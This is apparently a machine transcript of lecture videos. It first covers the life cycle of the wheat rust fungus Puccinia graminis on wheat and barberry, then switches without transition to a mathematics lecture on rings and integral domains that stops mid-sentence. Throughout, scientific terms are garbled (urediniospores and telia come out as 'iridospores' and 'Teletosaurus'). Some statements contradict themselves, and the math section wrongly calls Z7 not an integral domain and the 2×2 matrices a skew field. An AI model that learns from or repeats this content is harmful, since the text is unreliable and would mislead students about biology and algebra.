hyphae, and this becomes forms spermagonia and produces spermatia and receptive hyphae, and on spermatization it will enter into stage 1 where it produces acidiospores. Then after these acidiospores will be dispersed from this Barbary plant, and it will be dispersed by the air. Then in the stage 2, which will start on the wheat plant, these acidiospores germinate on wheat. Later on, they produce dikaryotic mycelium from uridia bearing iridinospores or iridospores. We can call it as iridospores also. Then after the growing period, when the seasonal changes triggers the formation of Telia or Teletosaurus bearing teletospores in the place of iridospores. In the stage 2, iridospores are formed. These iridinospores are called as repeating spores because up to 4 to 5 generations, this will be causing infection and reinfection, spreading the disease all over the field. It will be spreading continuously. But when the growing season ends, that triggers the formation of teletospori. In the teletosori, the teletospores are formed. That becomes the stage 3. At the end of the stage 3, teletosaurs are formed. Either these are not capable of immediate germination, so it will undergo a rest. So these are called resting spores, right? And these resting spores either stay on the plant, wheat, or it will get into soil to form basidiospores. So finally, to conclude, in this session, I could say there are 5 life spores in its reproductive stage. If you take the most economic plant, wheat, as a primary host, and it will start with the stage 2 iridospores, either acidiospores or iridospores germinate on this wheat plant,
and it produces the dark brown or red color pustules on it, and later on at the end of growing period it produces teleospores. These teleospores later on, either on the debris of wheat plant or in the soil, undergo nuclear fission and undergoes meiosis to produce basidiospores. These basidiospores, as a haploid one, they go and attack barberry. They cannot attack wheat plant again. It doesn't. They will not survive if the barberry is absent. So it will attack barberry plant and it will produce spermatia and receptive hyphae. By spermatization and dicaryotization, diploidization, it gives esiospores. Again, this esiospores continues life cycle if wheat plant is present. So only we call this Puccinia as heteroecious rust because it has two alternate hosts, and macrocyclic rust because it has 5 stages of spores in its reproductive, and it's obligate parasite because it should have these alternate hosts, otherwise it will not be surviving. So to conclude, it is Puccinia graminis is a obligate parasite, macrocyclic, heterothalic, heteroecious, polymorphic rust. Welcome back to the second session at life cycle of Puccinia and wheat. Students, in the last session we have learnt in broad perspective the overall life cycle of Puccinia graminis tritica and the wheat. Now we study in detail about the life cycle on wheat. See, as we have discussed in the previous session, that Puccinia graminis is a long cycle rust and it produces 5 distinctive stages in regular sequence. These are stage 0 and stage 1, spermagonia and spermatia, and which forms spermagonia bearing spermatia and receptive hyphae, acea bearing esiospores. These 2 stages will be on alternate host, barberry, and the stage 3, iridia bearing iridospores or iridospores, telia bearing teletospores, all will be on primary host, wheat, and stage 4, promycelia bearing basidiospores, it will be either on wheat plant or in the soil. So out of these 5 stages, iridospore, teletospore are produced on the primary host, wheat. So let's study in detail how this iridospore stage and followed by teletospore stage occurs on the wheat plant. See, this wheat plant, Puccinia reproduction asexually by sporulation it takes place. So you can observe asexual reproduction in wheat plant. So in this session we will be briefly studying on germination of esiospores, iridinospores, iridinia and iridinospores, germination of iridinospores, telia, teleospores, structure of teleospores, basidia and basidiospores. Now let's see one by one. We'll continue, we'll start with the stage 2, iridinia and iridinospores. See, I will be frequently changing the words iridinospores and it can be called as iridospores also. Don't get confused with that. So let's start how the infection starts on wheat and it spreads. See, initially you can see a dikaryotic spore here. This may be esiospore which has come from barberry, or it is a iridinospore which has come from the neighboring wheat plant. So it can cause infection, say either esiospore
or iridospore from the infected neighboring wheat plants, they will germinate a thread-like structure called primary germ tube. It will grow on the epidermis and enter the plant leaf through this stomata by forming a prosorium and substomatal vesicle. You could see this dikaryote nucleus will enter through the prosorium and substomatal vesicle. Later this will form a secondary germ tube, and finally it gives rise to a this dikaryote mycelium, which will spread intercellularly. Sometimes you can see this direct penetration also. So through penetration peg also it can directly enter into the through epidermis, and it spreads its hyphae intercellularly, and you can see here knob like hastoria which helps in drawing the nourishment. So within the 7 to 12 days of infection, hyphae get accumulated below the epidermis. So you can see in this diagram, see within 7 to 21 days, usually 1 week time also it will spread. You can see some vertically grown hyphae here. These are called sporophores. These are arranged compactly like a palisade layer, and the upper cell of this sporophore divide transferally gives rise to a basal cell, lower basal cell and upper spore initial. This basal cell do not divide again, whereas that upper cell again it will divide to produce lower stalk cell and a upper uridospore mother cell. Initial we can also call. So later on this stalk cell will enlarge, it will grow and produce a long stalk like this, and this iridospore initial will grow, draw nourishments from the mother plant tissue and enlarges, forms a ovular iridospore. And when this grows completely, you can observe in the field a reddish brown patches on the stems, leaves. It appears as though it is burnt by the fire. The name iridospore has come from the Greek, that means urir means to burn. So when this stage 2 occur on the plant or the field, you can see a red color. See, so only we call it as the red rust of wheat, and when it turn to next stage we can call it as black rust of wheat. See, now if you see an individual spore, this has a long stalk. This iridospore is a unicellular, dikaryotic, oval-shaped, brown-colored cell. Each spore will have a long stalk and a thick achinucleated, 2-layered wall. See, outer layer you can see in this picture, it is a thick, spiny exospore, whereas the inner layer is very delicate, hyaline. That means it doesn't have any color, and it's known as endospore. So this spore has dense cytoplasm and oil globules, stores food in oil globules, and there is a brown pigment present in this iridospore, which gives the significant color red to the patches. In these electronic microscope pictures of vertical section of iridosori or iridinea, you can see here the mycelia in this picture, mycelia accumulation below the epidermis, and from these palisade like sporophores upon which these iridospores are produced. See this oval shape in this picture, you can see that oval shape iridospores which are reddish brown in color due to the presence of brown pigment. Later, after completion of formation of iridospores, what happens that huge number of iridospores, they press against the overlaying epidermis, and these iridospores get exposed, and it will be diseminated by the wind, and it spreads the disease over the field. So this stage continues. Again the iridospore go and attack the fresh healthy leaf, and it will start penetrating inside and cause the disease. Again it produces iridospores, and it will again disseminated by the wind, and it will start spreading the disease like this up to 4 to 5 generations, or over the growing period completely iridospores will be producing again and again, causing
infection and again. So we call these iridospores as repeating spores. So only we call them as repeating spores. See, you can see this. You can observe this type of brown or reddish brown pustules over the field on stem, on leaf field. When disease spreads, you can see on the leaf also. So we call that, as I said, it gives burnt appearance, which comes from the Greek word urir, means to burn. So this is the iridosporangium. This brown patch you see is a iridosporangium, or in which iridospores are formed. Now we'll enter into the stage 3 of Puccinia life cycle on the wheat. So in the stage 3, tilia and tilitospores are formed. So towards the end of the growing period, wheat crop, the environmental conditions become unfavorable. It becomes very hot and dry for the growth of the iridospores, and at this moment they start producing tilitospores. Initially, tilitospores are produced in iridosora itself on the dorsal surface itself, but later on these tilia, the tilitospores, are produced in a separate sora called tilia on dorsal surface itself. So when the growth season ends, when the iridospores production is completely stopped because of hot and dry weather, it will start producing tilitospores. Gradually the color shifts from dark brown to black. Since these iridospores are brown in color, they give brown appearance, and these tilitospores are black in color. The field you can see black patches and elongated patches, those we call it as tilia. So now these can be called as black or stem rust. Now you can see in this diagram clearly. Previously I told that we have seen that iridosora is brown in color, whereas this teritopustule or teritosora, or we can call teritosaurus or tilia, you can use any of the word. These are you can see here is elongated, embossed, black color pustules. We can see on stem, we can see on leaf sheaths and leaf surfaces. If you get into detail these electron microscope pictures, you can see the tilitospores. As we have previously studied, the iridinospore structure is entirely different from tilitospore structure. We'll get into it now. These tilitospores are black or dark brown in color. They are two-celled, arranged one above the other, whereas in iridinospore is a single cell. But in tilitospores, there will be two cells arranged one above the other. It has a thick, black, smooth wall, and each cell has two nuclei. One belongs to plus strain and another belongs to minus strain. And each cell will have a germ pore. You can see in this. This is the structure of, in this diagram, you can see the structure of tilitospore. There are two cells arranged one above the other, and each cell will be having two cells. One becomes two nucleus. Sorry, one belongs to plus strain and another belongs to minus strain. When this matures, these will combine, join or fuse to form a diploid nucleus when mature. And these cells will have maybe a conical tip or rounded tip like this also we can observe, and it has a germ pore on the tip. The upper cell will have germ pore at the tip, but whereas the lower cell will have a germ pore below the septum. Then later on, these teliospores, after formation of teliospores in the tilia, they exert pressure on the overlaying epidermis, which finally ruptures and spores are exposed. These spores are formed towards the end of growing season, as indicated by the name itself. The teliospores comes from the Greek word telos. Telos means end. So since it is formed at the end, we call it as teliospores. Once as I told in the figure, once the teliospore matures, the two nucleus of each cell fuse to form a diploid nucleus. However, these two teliospores are not capable of immediate germination. Instead, they undergo a long period of rest, either in the soil
or in the host tissues till next spring. So hence these are called as resting spores. So in wheat we could see the iridospores which are forming in 4 to 5 generation and spreading this is till the growing season. When the growth season ends, when the situation or climate becomes unfavorable for the formation of iridospores, this fungi forms the teletospores which are dark black in color. So the symptoms and external symptoms what we observe will be shift from dark brown to black. So that iridospores we call it as repeating spores since it spreads the infection, whereas these teletospores are not capable of immediate germination, so we call them as resting spores. Then these resting teletospores enter into, after germination, will enter into basidial stage. This stage either it may occur on wheat plant itself, or after a dissemination by the wind it may fall into the ground in the soil when the favorable conditions comes. That means when it has sufficient amount of moisture and almost optimum temperature between 20 to 25 degrees, almost freezing condition you can say. At these conditions these teletospore germinate to produce basidiospores. In this picture you can see this is a structure of a teletospores when it is young. You can see the upper cell and a lower cell of a teletospore, both having dikaryotic nucleus, two nucleus, one belongs to plus strain, another belongs to minus strain. When it matures, maybe sometimes before dispersal or sometime after dispersal in the soil also, they fuse to form a diploid nucleus. These diploid nucleus teletospores, on return of favorable conditions, this will germinate and give rise to a basidial stage. You can see this will germinate. The upper cells, as we discussed earlier, it will have a germopore at the top, and the lower cell has a germopore below the septum. It will produce a tube-like structure called as promycelium, and for the upper cell this is known as epibasidium. For the lower cell it is known as hypobasidium. In these two dikaryotic diploid nucleus at this stage undergoes meiosis and produces 4 haploid nucleus. And 4 type of haploid nucleus. And these haploid nucleus, this promycelium will be having 4 haploid nucleus, and there will be a septate formation we can observe, and it will result in 4 haploid cells. 2 cells belongs to plus strain and 2 cells belong to minus strain. You can see these 4 haploid nucleus here. 2 cells belong to plus strain and 2 cells belong to minus strains. So at this stage it will have 4 haploid uninucleated cells. Then each cell of promycelium produces later sterigmata, and that means each cell will produce a outside hyaline tube-like structure. At the end of that structure it will produce a basidiospore. So then gradually the nucleus from the cell will travel through sterigmata and enter into the basidiospore. So finally when you see, you can observe in this picture, so it will be forming 4 haploid cells will be forming sterigmata, and finally producing this oval shaped basidiomycetes. 2 belong to plus strain and 2 belongs to minus strain. Then through water droplet mechanism mainly, these spores are forcibly discharged by air and infect only the Burberry plant, a secondary host. As we have discussed earlier, this is a heterogeneous rust and obligate parasite. These basidiospores can germinate only in the presence of on the Burberry plant. If there is no Burberry plant, it will not survive. It will wait till the Burberry plant comes, maybe up to 3 months or 6 months it will survive. Then later on, if it doesn't find the Burberry plant, it cannot reinfect wheat, it will die. So in the life cycle of Puccinia on wheat, we could see 3 stages. The first one, Uridinia containing iridospores.
which are unicellular and dikaryotic, and it has two-celled echinucleated two-celled structure, spiny exine and hyaline delicate intine. And these spores are also known as repeating spores because this will be causing again and again infection over the wheat plant. It spreads the disease in the growing season. In the stage 3, we have seen the teletosporous formation, in which the teletospores are formed. Each teletospores or teleospore will have two cells laid one above the other. They are conical in shape, and it will have two germ pole, and it is dikaryotic in nature, and one nucleus belongs to plus strain and another one belongs to minus strain. And when the growth season ends, this wheat plant dies, and maybe this with the pressure teletospores come out and disseminated by the wind or stay itself on the wheat plant till the favorable conditions. When the favorable condition returns, these two nucleus in each cell of teletospore join to form a diploid nucleus. This on meiosis, undergoing meiosis division, produce 4 haploid nucleus. On germination, it gives 4 basidiospores. Now these basidiospores can only infect a barberry plant, not a wheat plant. Now this Puccinia graminis, since it has both the uridinal stage and teleal stage only on wheat plant, we call wheat as the primary host. Now welcome back, students. In the previous 2 sessions, we have studied the complete life cycle of Puccinia and the life cycle of Puccinia and wheat plant. In this session, we are going to study briefly about life cycle of Puccinia graminis on barberry. So barberry, as I have said, the scientific name is Barberry vulgaris, and this act as a secondary host or a alternate host. The basidiospores, which are formed by wheat plant, Puccinia on the wheat plant, during the favorable conditions, teletospores will give rise to basidiospores. On favorable conditions, it will germinate on wheat. This we have discussed in the previous session. On barberry, we can see the sexual reproduction of Puccinia, whereas in wheat we have seen the asexual reproduction, and in barberry we can see the sexual reproduction. They reproduce sexually by a plasmogamy. This will contain 2 stages, stage 0 and stage 1. Stage 0 means it is a pycnospore stage. On upper epidermis, these positive and negative basidiospores germinate to give rise to spermagonia, and that will have spermatia and receptive hyphae. That is the stage 0. And the next spores that is developed is the acidiospore stage, Asia. These pycnospores are formed on the upper surface or the dorsal surface, whereas the asciospores are formed on the ventral surface. These can be formed at the same time, whereas we have seen in the wheat, these uridinospores are formed in the growth season. After completion of growth season, when the situations are the climate is not favorable, they will form teletospores. But whereas in barberry, at the same time on the dorsal surface of the leaf, we can observe pycnospores formation,
and at the lower surface of the leaf we can see this acidiospores formation. So now let's see the stage 0 spermagonia formation and spermatia. See, the spermagonia we also call it as pycnia. These basidiospores germinate on the upper surface by forming, it will form a germ tube which enters the host through epidermis. As we earlier discussed that uridinospores or aschiospores enters through forming a germ tube, primary germ tube that enters through stomata and apprecium and substomatal vesicle, and it will form secondary hyphae. Everything will be repeated here. What it will happen, this germ tube penetrates. After penetration, it will intracellularly, what it forms a, you can see in this, after penetration, this will form below the epidermis intracellular monokaryotic septate mycelium known as prosmycelium. See, in the wheat plant we have studied that will produce a dikaryotic mycelium. Dikaryotic means each cell will be having 2 nucleus, and at the end of acidiospores maturation, that the meiosis takes place and it gives rise to 4 basidiospores. They are haploid in nature. Once the haploid basidiospores germinate on barberry plant, naturally it gives rise to a haplomycelium. Haplomycelium, we call it as primary hyphae. This will spread intercellularly, and it draws nourishment through a branched or knob-shaped haustorium, and it spreads. This mycelium may be carrying either plus or minus nuclei depending upon the basidiospore from which it has raised. So within 3 to 4 days of infection, this mycelium forms a flask-shaped structure like this. You can see here a flask-shaped structure. This is known as spermagonia. Within 3 to 4 days of infection, see, you can see here, these are the structure of a basidium, germin and basidiospores formation. See, if you think this plus basidiospore strain germinates here, it forms a spermagonia belongs to plus strain. And here minus basidiospore germinates this side. On the same leaf, it produces minus strain type of promycelium. This will spread below the epidermis within 3 to 4 days, form a flask-shaped structure known as spermagonia. This is opened through a narrow pore known as ostiole. This pore is known as ostiole. Within the cavity, you can see many elongated cell structures which are tightly compactly aligned. Here you can see these. These are known as spermatophores. You can see here. At the tip of spermatophore, it gradually produces a series of uninucleated cells known as spermatium. So these are present inside the cavity. In this cell, you can see, in the cavity, you can see a series of unicellular spermatia. And at this opening, you can see ostiole, there are some brown color hair-like structures known as periphyses, and some grow above the periphyses. These structures, they are known as receptive hyphae, they are branched. This periphyses is not branched, they are just brown color or orange color hair which covers and protects the spermatia, and this receptive hyphae is a branched structure and which is considered as female reproductive organ of fungi, and this spermatia is considered as the male reproductive organ. As we discussed already, this barberry plant Puccinia shows sexual reproduction, and this spermagonia represent the sexual organs of fungus, spermatia as male structure and receptive hyphae as female structure. The spermatia in one spermagonia, only one type of strains will be present. Either it will be producing only positive spermatia and positive receptive hyphae. So by water drop technology, this ostiole will produce a honey nectar towards the end, which is attracted by the insect. It will come for it, insect, and it will take the spermatia with its wings, and it will spread over the receptive hyphae of another spermagonia present on the same leaf.
So sometimes through wind also it can be disseminated, and sometimes through insects it will be transferred from one spermagonia to another spermagonia. So from suppose if you think one spermagonia, as we previously discussed, belong to positive basidiospores, that positive spermatia will go to the negative receptive hyphae of another spermagonia present on the same leaf. So this receptive hyphae will receive the spermatia of opposite strain. Here you can see, suppose if you think this is a positive strain, it will receive a negative spermatia. Once this process is known as spermatization. So transfer of spermatia from one spermagonia to receptive hyphae of another spermagonia is known as spermatization. After receival of spermatia by, that means male nucleus, by female reproductive organ receptive hyphae, what happens? It will penetrate into the first cell of receptive hyphae. After entering it to the first cell, this male cell start dividing again and again, by it will produce many nucleus, many male nucleus. This male nucleus will enter into all cells through septapore. In the vegetative structure we have studied that it has a simple central septal pore. So through that pore, these repeatedly developed male nucleus will be transferred to all cells of the mycelia. All the cells, so it will reach all the cells of the mycelia, and completely it will dikaryoticization will takes place. So each and every cell will be having a plus and minus cell nucleus. So male minus nucleus has come and it has divided and again divided and entered into all the cells of mycelium. So completely after spermatization, though in the spermatization process only a receptive hyphae received a single spermatia belong to opposite strain, it has divided again and again to produce many male nucleus which enters through the septum pore, and completely then it will make mycelium dikaryotic. Now we will see the next stage, achea formation and acheospores production. In this stage you can see this when the on the upper epidermis, when this spermagonia is formed and spermatia and receptive spores are being formed, at the lower surface of the leaves, what happens that mycelia through intercellularly come and get accumulated at the lower epidermis, and it forms a globose mass known as acial primordium or acial initial. It is initially it is monokaryotic in nature. So at the upper side you can see the formation of pycnospores, that means spermatia and receptive hyphae. At the lower stage we can have this acheospore, acial primordium or initial. It is monokaryotic in nature. Once the dikaryoticization takes place, occurs, this becomes this lower acial primordium becomes acheospore 4. So initially it will be monokaryotic due to the travel of all male nucleus from the upper receptive hyphae to which enters into all the mycelial cells. It completely the mycelium become dikaryotic, and the lower at the lower epidermis the acial primordium also becomes dikaryotized and it acts as acheospore 4. This acheospore 4 will have a basal cell. This basal cell, what will happen? It will start after dikaryoticization. Initially it will have only basal cell, single basal cell. After dikaryoticization, it will repeatedly produce many cells. It will produce one large cell, then one small cell, continued by one large scale. One division it produces 2 cells. One is a large cell, another one is a small cell. Like this it will be continuously producing many cells. You can see this in this diagram. This is the ventral view of a barberry leaf. You can see the yellowish patches which is embossed outside, and this is the vertical section of a leaf where you can see the achea.
So this here you can see the asiosporophore after dikaryoticization the basal cell will start dividing again to produce asiospore. The larger cell we call it as asiospore and the small cell we call it as intercalary cell or disjuncture cell. So this entire thing is a cup shaped structure is covered by a layer known as peridium. This peridium also has developed from the peripheral basal cells. From asiosporophore basal cell also from peripheral side will gives to peridium. So this cup shape structure is known as acia, or in singular it is known as acium. Now if you see the structure of asiospore individually, as I said, this basal cell divides once to give rise to a bigger cell and a smaller cell, one bigger cell and a smaller cell. Bigger cell we call it as asiospore and a smaller cell we call it as intercalary cell or disjunctor cell. This has some mucilage, it carries some mucilage which helps in dispersal of these asiospores. Under suitable conditions, this will be dispersed. Each asiospore, we have seen in the previous slide, they are polyhedral binucleated structure. It has a outer thick smooth exine and a thin inner intine. When matures, the asiospores fall from the cup and carried away by the air currents. Under suitable condition, this asiospore germinates and produce dikaryotic mycelium on wheat to repeat the life cycle. So here one thing we had to observe is in this barberry it produces pycnospores, that is spermatia, that is received by receptive hyphae. Then after entering, dikaryoization takes place. Then dikaryoization it will be proceeded till the lower epidermis hyphae and the end cell epidermis asiosporophore will act as a acidium initial to produce acidiospores. These acidiospores will be blown away by the wind current. So once it comes out of the plant, it cannot reinfect the barberry again. If the wheat plant is present only, it can survive. Otherwise, it will wait for the primary host. If it doesn't find any primary host, it cannot survive. That's why we call this Puccinia as a heterogeneous rust and obligate parasite. Say, in a broad sense, if you see the entire life cycle of Puccinia, including a primary host and wheat and a secondary host barberry, we can see here, we'll start, since the wheat is of economic importance, I'll start with stage 2. This wheat plant is infected by uridineospores or asiospores. Asiospores develop from barberry plant or uridineospores developed from wheat plant itself will cause infection and produce uridinosori to produce again uridineospores. These uridineospores are, since they are brown in color, it gives a brownish appearance, so we call it as a red rust of stem when plant is in this stage. So this iridinospore condition continues till the growth period. Once the growth period comes to an end, the environmental conditions become unfavorable for the iridinospore formation. What does the fungal Puccinia hyphae do? It will start producing teletospores. Initially, these teletospores are produced in uridinosori, but later these will be produced in a specialized sori called telia or teletosaurus. We can call it as otherwise also. In this teletosaurus, so these teletosaurus, since they are black in color, so we can observe the change in the field in the field view itself. So it will change from brown color to black color at the end of the growth stage when the iridinospores are displaced by the formation of teletospores. The iridinospores are unicellular, they are dikaryotic, no doubt, oval shaped brown pigment, whereas the teletospores have two cells, dikaryotic cells. It has two cells, one above the above, they are spindle shaped, and it has only two germ pores, one each in each cell. These teletospores, on return to a favorable condition, either on the wheat plant or in the soil,
they will start after meiosis they will start producing basidiophore. You can see here. See here, these will undergo karyogamy, though this undergoes meiosis and gives rise to a haploid 4 unicellular basidiospores. So this is the life cycle that we can see in primary host wheat, and later on these basidiospores, they germinate on the Burberry alternate host and gives rise to the pycnospores formation. That means you can see the spermatia formation here, where spermagonia formation, where it produces spermatia and the receptive hyphae, and followed by the dikaryoization from the upper surface to it will enter into the lower surface and forms the acidiospores. These acidiospores again can infect only the wheat plant. So if it doesn't find a wheat plant, it cannot survive. So finally to say the Puccinia graminis triticae is a obligate parasite. It a polymorphic, macrocyclic and heterothallic heteroecious rust. Welcome to Mana TV classes. My name is Dr. J. Girish Kumar, Assistant Professor of Mathematics, SVA Government College, Srikalahasti. In this class, we will learn about an integral domain. This integral domain is a very important and interesting topic in the area of ring theory. Before going to introduce an integral domain, first of all, we recollect the definitions of some basic ideas on rings. Okay. What is meant by ring? Suppose R is a non-empty set and plus comma dot be two binary operations. Suppose if these two binary operations satisfies the properties, then the algebraic structure R comma plus comma dot is said to be ring. Then what are the properties? First one, R is a commutative group with respect to addition. R is a commutative group with respect to addition. And second one is R is a semi group with respect to multiplication. And the third one is distributive laws hold in R. So here there are two distributive laws. One is left distributive law, that is A into B plus C is equal to AB plus AC, and the right distributive law is B plus C into A is equal to BA plus CA. Okay. So these are some examples of rings. That means the ring of integer, that is Z is the set of integers, Q is set of rational numbers, R is set of real numbers, and C is set of complex numbers. These all are rings with respect to usual addition and usual multiplication, and M2 is the set of all matrices of the 2 by 2 type. So here the matrix addition and matrix multiplication is the binary operations, therefore M2 forms a ring. Next, coming to ring with unity. Suppose in case this ring, that is R, has the multiplicative identity. So what is the multiplicative identity? 1. Suppose if 1 belongs to R, then the ring R comma plus comma dot is said to be ring with unity. That is, a ring is said, R comma plus comma dot is said to be a ring with unity if there exists a multiplicative identity. That is, 1 belongs to R such that A 1 into A is equal to A into 1, that is equal to A for all A belongs to R.
Next, coming to the commutative ring. Suppose if capital R satisfies the commutative property with respect to multiplication, that means A B is equal to B A for all A comma B belongs to R, then the ring is said to be commutative ring. Next, zero divisors. Suppose if you consider any two non-zero elements, then for example, A is not equal to 0 and B is also not equal to 0, but their product, that is A B, is equal to 0. Suppose if this is possible, that is A not equal to 0, B not equal to 0, but A B is equal to 0, then the elements A and B are said to be zero divisors. So, that is a non-zero element A of a ring R is said to be zero divisor or divisor of 0 if there exists an element B not equal to 0. That means, here A is a non-zero element and B is also non-zero element, but the product A B is equal to 0 or B A is equal to 0. Then this is possible, therefore, A and B are said to be zero divisors. Suppose in case these type of elements are there in the ring, that means that concept is said to be ring with zero divisors. Suppose these type of elements are there in the ring, then this ring is said to be ring with zero divisors. That means, a ring is said to be a ring with zero divisors if there exist two non-zero elements A and B, such that either A B is equal to 0 or B A is equal to 0. So, next one, ring without zero divisor. Suppose these type of elements are there in the ring, then that ring is said to be ring without with zero divisor. Suppose these type of elements are not there in the ring, then that ring is said to be ring without zero divisor. So, this without zero divisor property can also be stated as, suppose if A not equal to 0 and B not equal to 0, that implies A B is also not equal to 0. And similar one, that is this concept also can also be restated as, suppose if A B is equal to 0, that implies either A is equal to 0 or B is equal to 0. So, dear students, the ring without zero divisor concept can be defined in the two ways. One way is A not equal to 0, B not equal to 0, that implies A B is also not equal to 0. And the another way, if A B is equal to 0, that implies either A is equal to 0 or B is equal to 0. Okay. So, but while we proving the theorems, we frequently use this concept, this type of definition, that is, suppose if you prove any concept ring without zero divisors, then we will take the help of this concept, that is A B is equal to 0, that implies either A equal to 0 or B is equal to 0. Okay. So, a ring is said to be ring without zero divisors or has no zero divisors if the product of no two non-zero elements. So, here the no two non-zero elements of R is 0, that is, if A not equal to 0 and B not equal to 0, that implies A B is also not equal to 0, or if A is equal to 0, that implies either A is equal to 0 or B is equal to 0. So, example for the ring with zero divisors. Suppose if you take Z12, that is the set of residues modulo 12. So, the elements are 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10 and 11. These are the elements in Z12. So, here the binary operations are addition modulo 12 and multiplication modulo 12. So, in this set we have some zero divisors. So, what are they? Suppose if 2 is a not equal to non-zero element and 6 is also a non-zero element, but the combination with respect to the second binary operation, that means 2 multiplication modulo 12 6 is equal to. So, what is the resultant? That is 2 into 6 is 12. 12 is divided by 12 is, you get the remainder 0. That means, the product of two non-zero element is 0.
So, the product of two non-zero elements is 0, then the two non-zero elements are said to be 0 divisors. So, similarly 3 multiplication modulo 12, 4 is also 0, 4 multiplication modulo 12, 6 is equal to 0, and 6 multiplication modulo 12, 10 equal to 0, okay, and 8 multiplication modulo 12, 9 is equal to 0. So, therefore, the 0 divisors are 2, 3, 4, 6, 8, 9 and 10. These are the 0 divisors in Z12. Okay. So, you just watch this example. Next, coming to the another example, suppose M2. M2 is the set of all matrices of the 2 by 2 type. M2 is the set of all 2 by 2 matrices like A, B, C, D. Okay. So, and so on. So, this matrix is also a ring with 0 divisors. Why? Because suppose if you can take A is equal to 1 0 0 0, this is a non-zero matrix. Generally 0 matrix means any all entries in the matrix are 0, then that matrix is said to be 0 matrix. If any one of the entry is not equal to 0, then that matrix is simply said to be non-zero matrix. So, here this element, that is this entry is non-zero, therefore, the total matrix is a non-zero matrix. Similarly, for example, B is equal to 0 0 1 0. So, this is also a non-zero matrix. So, these two are 2 by 2 matrices. These 2 by 2 matrices are in M2. Already we know that M2 is a ring with respect to matrices addition and matrices multiplication. Then AB is equal to the product of A and B is equal to the 0 0 0 0, that is equal to 0 matrix. So, here A not equal to 0 and B not equal to 0, but the product AB is equal to 0, then the elements A and B are said to be ring with said to be 0 divisors. Okay. So, we can take suppose Z, the ring of integers. Z is a ring of integers with respect to usual addition and multiplication. So, this ring is ring without 0 divisors. Why? Because if you can take any two non-zero elements in Z, for example 2 and 3, with respect to ordinary multiplication. So, 2 is a non-zero element and 3 is also a non-zero element, but the product 2 into 3 6, this is also a non-zero element. So, this ring Z and on that ring if you consider any two non-zero element, their product is also a non-zero element, therefore, that Z is a ring without 0 divisors. Okay. Next, coming to our present topic, integral domain. Okay. So, integral domain means suppose let R comma plus comma dot be a ring. Suppose if R is a commutative ring with respect to multiplication, and suppose if 1 belongs to R, that is if R has the multiplicative identity, and suppose if R has no 0 divisors, then the ring R comma plus comma dot is said to be an integral domain. That is, the ring R comma plus comma dot is said to be an integral domain if the following postulates are satisfied. First one is R is a commutative with respect to multiplication, and R has the multiplicative identity 1, and R has no 0 divisors. Next, some examples of integral domain are the ring of integers, or the set of the set of rational numbers, the set of real numbers, the set of complex numbers. These all are the integral domains with respect to ordinary addition and ordinary multiplication. Why? Because this set are all commutative rings with respect to
there is multiplication, and they said these all are contain the multiplicative identity 1, and these all sets having no 0 divisors. Suppose if you consider the another one, that is Z7, another example, that is Z7. Suppose Z7 is equal to set of 0, 1, 2, 3, 4, 5, 6, the set of residues modulo 7. So, this is a ring with respect to addition modulo 7 and multiplication modulo 7. So, in this ring, this is 0 divisors or does not exist. Why? Because if you consider, of course, consider any two elements from this ring, for example 2 and 4. So, what is the combination of multiplication modulo 7 of these two elements is 2 multiplication modulo 7 4 is 8, 8 is divided by 7, you get the remainder as 1. That means, this 2 is a non-zero element, 4 is also a non-zero element, but the product of these two non-zero element is again a non-zero element. Okay. So, this condition may be tested for any of the two elements from this ring. So, even though this Z7 is a commutative ring, and even though this Z7 contains the unity element, but this Z7 does not having any 0 divisor, therefore, this Z7 is only a commutative ring with unity, but it does not having any 0 divisors, therefore, it is not an integral domain. And the set M2 of all 2 by 2 matrices whose entries are real numbers is not an integral domain. That is M2, M2 is the set of all 2 by 2 matrices set, that is M2 is equal to set of all 2 by 2 matrices like this. So, this is a ring with respect to matrices addition and matrices multiplication. Suppose this ring has the identity element with respect to matrices multiplication, that element is 1 0 0 1. Even though this of course, here the commutative property with respect to multiplication is not satisfied, because in general matrices multiplication is not commutative. Therefore, the ring M2 is not an integral domain. Okay. The set M2 of all 2 by 2 matrices whose entries are real numbers is not an integral domain with respect to usual matrix addition and the matrix multiplication, because M2 is not commutative with respect to matrix multiplication. Next, unit element. Then here we already know that unity element. Unity element means the multiplicative identity, but here we introduce the new topic unit element. Unit element. Unit element. Unit element. Then what is meant by unit element? Unit element is nothing but those elements in the ring having the multiplicative inverse. For example, in the set of rational numbers Q, suppose if you consider 2 belongs to Q. Already we know that the set of rational numbers is a ring with respect to usual addition and multiplication. Suppose if you consider any non-zero element 2, these two having the multiplicative inverse, that is the multiplicative inverse of 2 is 1 by 2. So, this is also an element of 2 Q. So, therefore, 2 into 1 by 2 is equal to 1 by 2 into 2 is equal to 1. So, that means 1 by 2 is the multiplicative inverse of 2. So, this 1 by 2 is an element of Q, therefore, 2 is the unit element. 2 is the unit element. That means, those elements are having the multiplicative inverse are said to be unit elements. That means, let R comma plus comma dot be the ring with unity. An element U belongs to R is said to be unit if it has the multiplicative inverse in R. Okay. Next example. Suppose if you consider Z the ring of integers,
here you have only 2 units, namely -1 and 1, because -1 into 1 is equal to 1 and -1 into -1 equal to 1. That means, here the inverse of 1 is 1. So, therefore, 1 is the unit. Here the inverse of -1 is -1, therefore, -1 is also unit. Hence, the ring of integers has only 2 units, that are -1 and 1. Next, division ring or skew field. Suppose r comma plus comma dot is a ring. In case this R contains unity element and all the non-zero elements in capital R having the multiplicative inverses in capital R. That means, all the non-zero elements in R possess multiplicative inverse. Okay. So, dear students, we already know the definition of ring is R is a commutative group with respect to addition, commutative group, and R is a semi group with respect to multiplication, semi group. Okay. So, here we introduce the another 2 conditions, namely 1 belongs to R, 1 is nothing but the multiplicative identity. So, in the semi group we have only 2 properties, that is closure and associative. Along with we add one more condition, that is the multiplicative identity is also there in R. And the third next one is all non-zero elements in R possess multiplicative inverses. That means, the inverse properties also exist. Inverse also exist. So, here you have closure, associative, and this is identity, and this is inverse. So, consider these 4 properties. R is a ring, R is a group with respect to multiplication. Okay. Suppose if the ring R has unity and every non-zero element in R has the multiplicative inverse, then that ring is said to be division ring or skew field. So, this can be simply we say that if all the non-zero elements in a ring R comma plus comma dot forms a multiplicative group. Okay. So, multiplicative group means here the semi group and the identity and the inverse. So, combining these 4 properties, R is a group with respect to multiplication. Okay. So, then that ring is said to be division ring or skew field. So, the set of rational numbers, the set of real numbers, the set of complex numbers, these all are division rings or skew fields with respect to ordinary addition and ordinary multiplication. Next, the set of 2 by 2 matrices with respect to matrices addition and matrices multiplication is a skew field. Okay. So, already we know that matrices multiplication in general is not commutative. So, here there is no need for the commutative property for skew field. So, therefore, M2 is only a skew field, 